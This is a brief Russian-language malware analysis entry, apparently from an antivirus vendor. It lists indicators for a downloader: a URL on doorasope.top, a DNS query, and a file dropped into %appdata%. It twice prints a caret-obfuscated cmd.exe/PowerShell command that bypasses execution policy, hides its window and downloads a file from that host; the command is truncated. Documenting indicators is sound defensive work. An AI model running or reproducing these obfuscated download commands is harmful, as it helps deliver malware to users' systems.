Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwE^rshELl.^E^Xe -ExecuTI^OnP^OLI^cy ByPa^SS ^-N^OPR^O^FiLE^ -^WI^NDowSTyL^E^ HiDdEN ^(^N^eW-^Ob^j^eCt s^Y^S^Te^m.^Net.We^B^cl^ien^T)^.DOwN^Lo^adF^Ile^('http://www.doorasope.top/r...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pOwE^rshELl.^E^Xe -ExecuTI^OnP^OLI^cy ByPa^SS ^-N^OPR^O^FiLE^ -^WI^NDowSTyL^E^ HiDdEN ^(^N^eW-^Ob^j^eCt s^Y^S^Te^m.^Net.We^B^cl^ien^T)^.DOwN^Lo^adF^Ile^('http://www.doorasope.top/r...' (со скрытым окном)